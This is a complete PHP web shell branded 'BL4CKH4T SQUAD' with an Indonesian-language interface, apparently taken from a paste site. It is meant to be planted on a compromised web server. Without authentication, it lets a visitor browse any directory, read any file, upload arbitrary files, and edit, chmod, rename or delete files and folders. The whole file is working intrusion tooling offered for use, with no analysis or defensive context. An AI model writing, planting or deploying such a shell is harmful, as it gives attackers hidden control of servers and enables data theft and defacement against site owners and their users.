<?phperror_reporting(0);set_time_limit(0);if(get_magic_quotes_gpc()){f

1. <?php
2. error_reporting(0);
3. set_time_limit(0);
4.  
5. if(get_magic_quotes_gpc()){
6. foreach($_POST as $key=>$value){
7. $_POST[$key] = stripslashes($value);
8. }
9. }
10. echo '<!DOCTYPE HTML>
11. <head>
12. <link href="" rel="stylesheet" type="text/css">
13. <meta property="og:image" content="https://i.ibb.co/9rXyhWf/Screenshot-2019-09-29-18-16-18.png">
14. <title>BL4CKH4T SQUAD :(</title>
15. <meta charset="UTF-8">
16. <meta name="Author" content="BL4CKH4T"/>
17. <meta name="copyright" content="BL4CKH4T"/>
18. <meta name="description" content="Defeated By : Mr Berdasi.BL4CH4T"/>
19. <style>
20. body{
21. font-family: "road rage", cursive;
22. background-color: black;
23. color:cyan;
24. }
25. #content tr:hover{
26. background-color: aqua;
27. text-shadow:0px 0px 10px #fff;
28. }
29. #content .first{
30. background-color: aqua;
31. }
32. table{
33. border: 1px #000000 dotted;
34. }
35. a{
36. color:white;
37. text-decoration: none;
38. }
39. a:hover{
40. color:blue;
41. text-shadow:0px 0px 10px #ffffff;
42. }
43. input,select,textarea{
44. border: 1px #000000 solid;
45. -moz-border-radius: 5px;
46. -webkit-border-radius:5px;
47. border-radius:5px;
48. }
49. </style>
50. </head>
51. <body>
52. <H1><center> <font color="red">[!] Shell MINI GANS ^_^ [!]</font><br>
53. <center><img src="https://i.ibb.co/9rXyhWf/Screenshot-2019-09-29-18-16-18.png" aria-busy="true" style="width: 450px; height: 450px;"></h1><center>
54. <tr><td><font color="cyan">Path :</font> ';
55. if(isset($_GET['path'])){
56. $path = $_GET['path'];
57. }else{
58. $path = getcwd();
59. }
60. $path = str_replace('\\','/',$path);
61. $paths = explode('/',$path);
62.  
63. foreach($paths as $id=>$pat){
64. if($pat == '' && $id == 0){
65. $a = true;
66. echo '<a href="?path=/">/</a>';
67. continue;
68. }
69. if($pat == '') continue;
70. echo '<a href="?path=';
71. for($i=0;$i<=$id;$i++){
72. echo "$paths[$i]";
73. if($i != $id) echo "/";
74. }
75. echo '">'.$pat.'</a>/';
76. }
77. echo '</td></tr><tr><td>';
78. if(isset($_FILES['file'])){
79. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
80. echo '<font color="green">Sucessfuly Upload!</font><br />';
81. }else{
82. echo '<font color="red">Gagal Upload</font><br/>';
83. }
84. }
85. echo '<form enctype="multipart/form-data" method="POST">
86. <font color="aqua">Upload Geratis Coeg:) :</font> <input type="file" name="file" />
87. <input type="submit" value="upload" />
88. </form>
89. </td></tr>';
90. if(isset($_GET['filesrc'])){
91. echo "<tr><td>Current File : ";
92. echo $_GET['filesrc'];
93. echo '</tr></td></table><br />';
94. echo('<pre>'.htmlspecialchars(file_get_contents($_GET['filesrc'])).'</pre>');
95. }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){
96. echo '</table><br /><center>'.$_POST['path'].'<br /><br />';
97. if($_POST['opt'] == 'chmod'){
98. if(isset($_POST['perm'])){
99. if(chmod($_POST['path'],$_POST['perm'])){
100. echo '<font color="green">Leh Uga Berhasil >:(</font><br/>';
101. }else{
102. echo '<font color="red">Gagal Edit Goblok</font><br />';
103. }
104. }
105. echo '<form method="POST">
106. Permission : <input name="perm" type="text" size="4" value="'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" />
107. <input type="hidden" name="path" value="'.$_POST['path'].'">
108. <input type="hidden" name="opt" value="chmod">
109. <input type="submit" value="Go" />
110. </form>';
111. }elseif($_POST['opt'] == 'rename'){
112. if(isset($_POST['newname'])){
113. if(rename($_POST['path'],$path.'/'.$_POST['newname'])){
114. echo '<font color="green">Berhasil Anjay!!!</font><br/>';
115. }else{
116. echo '<font color="red">Buat Apa Lu Ganti Gagal Juga >:(</font><br />';
117. }
118. $_POST['name'] = $_POST['newname'];
119. }
120. echo '<form method="POST">
121. New Name : <input name="newname" type="text" size="20" value="'.$_POST['name'].'" />
122. <input type="hidden" name="path" value="'.$_POST['path'].'">
123. <input type="hidden" name="opt" value="rename">
124. <input type="submit" value="Go" />
125. </form>';
126. }elseif($_POST['opt'] == 'edit'){
127. if(isset($_POST['src'])){
128. $fp = fopen($_POST['path'],'w');
129. if(fwrite($fp,$_POST['src'])){
130. echo '<font color="green">Berhasil Di Edit Coeg</font><br/>';
131. }else{
132. echo '<font color="red">Gakk Bisa Di Edit Nih File Goblok:V</font><br/>';
133. }
134. fclose($fp);
135. }
136. echo '<form method="POST">
137. <textarea cols=80 rows=20 name="src">'.htmlspecialchars(file_get_contents($_POST['path'])).'</textarea><br />
138. <input type="hidden" name="path" value="'.$_POST['path'].'">
139. <input type="hidden" name="opt" value="edit">
140. <input type="submit" value="Save" />
141. </form>';
142. }
143. echo '</center>';
144. }else{
145. echo '</table><br/><center>';
146. if(isset($_GET['option']) && $_POST['opt'] == 'delete'){
147. if($_POST['type'] == 'dir'){
148. if(rmdir($_POST['path'])){
149. echo '<font color="green">Dir TERHAPUS</font><br/>';
150. }else{
151. echo '<font color="red">Dir Gak bisa Dihapus Ajg >:( </font><br/>';
152. }
153. }elseif($_POST['type'] == 'file'){
154. if(unlink($_POST['path'])){
155. echo '<font color="green">TERHAPUS</font><br/>';
156. }else{
157. echo '<font color="red">Tak Terhapus</font><br/>';
158. }
159. }
160. }
161. echo '</center>';
162. $scandir = scandir($path);
163. echo '<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">
164. <tr class="first">
165. <td><center>Name</peller></center></td>
166. <td><center>Size</peller></center></td>
167. <td><center>Permission</peller></center></td>
168. <td><center>Modify</peller></center></td>
169. </tr>';
170.  
171. foreach($scandir as $dir){
172. if(!is_dir($path.'/'.$dir) || $dir == '.' || $dir == '..') continue;
173. echo '<tr>
174. <td><a href="?path='.$path.'/'.$dir.'">'.$dir.'</a></td>
175. <td><center>--</center></td>
176. <td><center>';
177. if(is_writable($path.'/'.$dir)) echo '<font color="green">';
178. elseif(!is_readable($path.'/'.$dir)) echo '<font color="red">';
179. echo perms($path.'/'.$dir);
180. if(is_writable($path.'/'.$dir) || !is_readable($path.'/'.$dir)) echo '</font>';
181.  
182. echo '</center></td>
183. <td><center><form method="POST" action="?option&path='.$path.'">
184. <select name="opt">
185. <option value="">Select</option>
186. <option value="delete">Delete</option>
187. <option value="chmod">Chmod</option>
188. <option value="rename">Rename</option>
189. </select>
190. <input type="hidden" name="type" value="dir">
191. <input type="hidden" name="name" value="'.$dir.'">
192. <input type="hidden" name="path" value="'.$path.'/'.$dir.'">
193. <input type="submit" value=">">
194. </form></center></td>
195. </tr>';
196. }
197. echo '<tr class="first"><td></td><td></td><td></td><td></td></tr>';
198. foreach($scandir as $file){
199. if(!is_file($path.'/'.$file)) continue;
200. $size = filesize($path.'/'.$file)/1024;
201. $size = round($size,3);
202. if($size >= 1024){
203. $size = round($size/1024,2).' MB';
204. }else{
205. $size = $size.' KB';
206. }
207.  
208. echo '<tr>
209. <td><a href="?filesrc='.$path.'/'.$file.'&path='.$path.'">'.$file.'</a></td>
210. <td><center>'.$size.'</center></td>
211. <td><center>';
212. if(is_writable($path.'/'.$file)) echo '<font color="green">';
213. elseif(!is_readable($path.'/'.$file)) echo '<font color="red">';
214. echo perms($path.'/'.$file);
215. if(is_writable($path.'/'.$file) || !is_readable($path.'/'.$file)) echo '</font>';
216. echo '</center></td>
217. <td><center><form method="POST" action="?option&path='.$path.'">
218. <select name="opt">
219. <option value="">Select</option>
220. <option value="delete">Delete</option>
221. <option value="chmod">Chmod</option>
222. <option value="rename">Rename</option>
223. <option value="edit">Edit</option>
224. </select>
225. <input type="hidden" name="type" value="file">
226. <input type="hidden" name="name" value="'.$file.'">
227. <input type="hidden" name="path" value="'.$path.'/'.$file.'">
228. <input type="submit" value=">">
229. </form></center></td>
230. </tr>';
231. }
232. echo '</table>
233. </div>';
234. }
235. echo '<center><br/><font color="cyan">UnderMind CopyRight @2k18</center>
236. </body>
237. </html>';
238. function perms($file){
239. $perms = fileperms($file);
240.  
241. if (($perms & 0xC000) == 0xC000) {
242. // Socket
243. $info = 's';
244. } elseif (($perms & 0xA000) == 0xA000) {
245. // Symbolic Link
246. $info = 'l';
247. } elseif (($perms & 0x8000) == 0x8000) {
248. // Regular
249. $info = '-';
250. } elseif (($perms & 0x6000) == 0x6000) {
251. // Block special
252. $info = 'b';
253. } elseif (($perms & 0x4000) == 0x4000) {
254. // Directory
255. $info = 'd';
256. } elseif (($perms & 0x2000) == 0x2000) {
257. // Character special
258. $info = 'c';
259. } elseif (($perms & 0x1000) == 0x1000) {
260. // FIFO pipe
261. $info = 'p';
262. } else {
263. // Unknown
264. $info = 'u';
265. }
266.  
267. // Owner
268. $info .= (($perms & 0x0100) ? 'r' : '-');
269. $info .= (($perms & 0x0080) ? 'w' : '-');
270. $info .= (($perms & 0x0040) ?
271. (($perms & 0x0800) ? 's' : 'x' ) :
272. (($perms & 0x0800) ? 'S' : '-'));
273.  
274. // Group
275. $info .= (($perms & 0x0020) ? 'r' : '-');
276. $info .= (($perms & 0x0010) ? 'w' : '-');
277. $info .= (($perms & 0x0008) ?
278. (($perms & 0x0400) ? 's' : 'x' ) :
279. (($perms & 0x0400) ? 'S' : '-'));
280.  
281. // World
282. $info .= (($perms & 0x0004) ? 'r' : '-');
283. $info .= (($perms & 0x0002) ? 'w' : '-');
284. $info .= (($perms & 0x0001) ?
285. (($perms & 0x0200) ? 't' : 'x' ) :
286. (($perms & 0x0200) ? 'T' : '-'));
287.  
288. return $info;
289. }
290. ?>